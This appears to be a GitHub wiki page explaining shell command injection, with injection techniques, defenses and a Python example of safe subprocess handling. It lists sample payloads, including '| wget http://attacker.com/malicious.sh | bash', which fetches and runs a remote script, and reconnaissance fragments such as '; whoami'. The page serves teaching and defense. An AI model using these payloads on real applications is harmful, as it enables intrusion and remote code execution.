info ‐ Shell Command Injection - taylorjohn/hacking GitHub Wiki

Shell Command Injection

Shell command injection is a security vulnerability that occurs when an application incorporates user-supplied input into shell commands without proper validation or sanitization. This vulnerability can allow attackers to execute arbitrary commands on the underlying operating system. Shell command injection is a prevalent issue in web applications, especially those that interact with the system shell to perform tasks such as executing external programs or managing files.

Description

In shell command injection, attackers exploit weaknesses in the handling of user input by the application. By injecting malicious commands into input fields or parameters that are subsequently passed to the shell for execution, attackers can execute arbitrary commands with the privileges of the vulnerable application.

How to Inject

Attackers inject malicious shell commands into vulnerable input fields or parameters by appending them to legitimate input data. Common injection techniques include:

  • Using Special Characters: Attackers may use special characters such as semicolons (;), pipes (|), ampersands (&), backticks (`), and redirection operators (>, <) to separate legitimate commands and inject malicious ones.

  • Command Substitution: Attackers may leverage command substitution to execute commands within other commands. This is typically achieved using backticks or $().

  • File Inclusion: If the application includes file paths or filenames as part of shell commands, attackers may manipulate these inputs to execute arbitrary commands stored within files.

How to Protect

To protect against shell command injection vulnerabilities, developers should implement the following security measures:

  • Input Validation: Validate and sanitize all user-supplied input to ensure that it adheres to expected formats and does not contain malicious characters or commands.

  • Parameterized Commands: Use parameterized commands or APIs provided by programming frameworks to interact with the underlying system. Avoid constructing shell commands by concatenating user input.

  • Whitelisting: Define and enforce a whitelist of allowed characters or commands for input fields. Reject any input that does not conform to the whitelist.

  • Least Privilege: Run the application with the least privilege necessary to perform its functions. Avoid running the application with elevated privileges that could exacerbate the impact of successful attacks.

Examples of Command Injection

  1. List Files in Directory:
    • Description: Executes the ls command to list files in the current directory.
    • Command: ; ls -la
  2. Access Root Directory:
    • Description: Changes the current directory to the root directory.
    • Command: && cd /
  3. Download and Execute Malicious Script:
    • Description: Downloads and executes a malicious script from a remote server.
    • Command: | wget http://attacker.com/malicious.sh | bash
  4. Display Current User:
    • Description: Retrieves the username of the current user.
    • Command: ; whoami
  5. Display System Information:
    • Description: Displays information about the underlying operating system.
    • Command: | uname -a
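The following Python example is added here to illustrate the "How to Protect" measures (input validation, parameterized commands, whitelisting) against the five payload fragments listed above; it is not code from the taylorjohn/hacking wiki. The directory-listing feature, the allowlist regex ALLOWED_NAME and the function names are assumptions made for this example. It contrasts the concatenated shell string that makes injection possible with an argv list passed to subprocess without a shell, and shows shlex.quote() as the fallback when a shell cannot be avoided.

```python
import re
import shlex
import subprocess

# Constructed allowlist for a "directory name" parameter: letters, digits,
# dot, underscore and hyphen only. Slashes, spaces and every shell
# metacharacter fall outside it and are rejected (assumed policy).
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")

# Characters the page lists as separators and substitution tokens, plus
# parentheses and newline, which /bin/sh also interprets. Used for
# reporting only; the allowlist above is the actual control.
SHELL_METACHARS = set(";|&`$<>()\n")


def build_vulnerable_command(user_input: str) -> str:
    """The anti-pattern: user input concatenated into one shell string.

    Handing this string to subprocess.run(..., shell=True) passes it to
    /bin/sh, which honours ; | & `...` $(...) and redirections found
    inside user_input, so the appended text runs as its own command.
    """
    return "ls -la " + user_input


def contains_shell_metachars(user_input: str) -> bool:
    """True if the input holds any character the shell would interpret."""
    return any(ch in SHELL_METACHARS for ch in user_input)


def validate_name(user_input: str) -> str:
    """Allowlist validation: return the input unchanged or raise ValueError."""
    if not ALLOWED_NAME.fullmatch(user_input):
        raise ValueError(f"rejected input: {user_input!r}")
    return user_input


def build_safe_argv(user_input: str) -> list[str]:
    """Parameterized form: the command is an argv list, not a shell string.

    subprocess.run(argv) with the default shell=False exec()s ls directly,
    so the user value is always a single literal argument. '--' stops ls
    from treating a value such as '-x' as an option.
    """
    return ["ls", "-la", "--", validate_name(user_input)]


def build_quoted_command(user_input: str) -> str:
    """Fallback when a shell really is required.

    shlex.quote() single-quotes the value so metacharacters lose their
    meaning; the page's own payloads become inert arguments. Validation
    with validate_name() should still be applied by the caller.
    """
    return "ls -la -- " + shlex.quote(user_input)


def safe_list_dir(user_input: str) -> subprocess.CompletedProcess:
    """Validate, then execute without a shell. Raises ValueError on bad input."""
    return subprocess.run(
        build_safe_argv(user_input), capture_output=True, text=True, check=False
    )


if __name__ == "__main__":
    # The five payload fragments from the wiki page, as constructed inputs.
    payloads = ["; ls -la", "&& cd /",
                "| wget http://attacker.com/malicious.sh | bash",
                "; whoami", "| uname -a"]
    for p in payloads:
        print("concatenated :", build_vulnerable_command(p))
        print("metachars    :", contains_shell_metachars(p))
        print("quoted       :", build_quoted_command(p))
        try:
            build_safe_argv(p)
        except ValueError as err:
            print("allowlist    :", err)
        print()
    print("legitimate   :", build_safe_argv("reports"))
```

Running the script shows each payload surviving intact in the concatenated string, being flagged by contains_shell_metachars(), being neutralised into a single quoted argument by build_quoted_command(), and being rejected outright by the allowlist; only a plain name such as reports reaches ls, and then only as one argv element.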

By understanding the risks associated with shell command injection and implementing robust security measures, developers can mitigate the risk of exploitation and protect their applications from unauthorized command execution.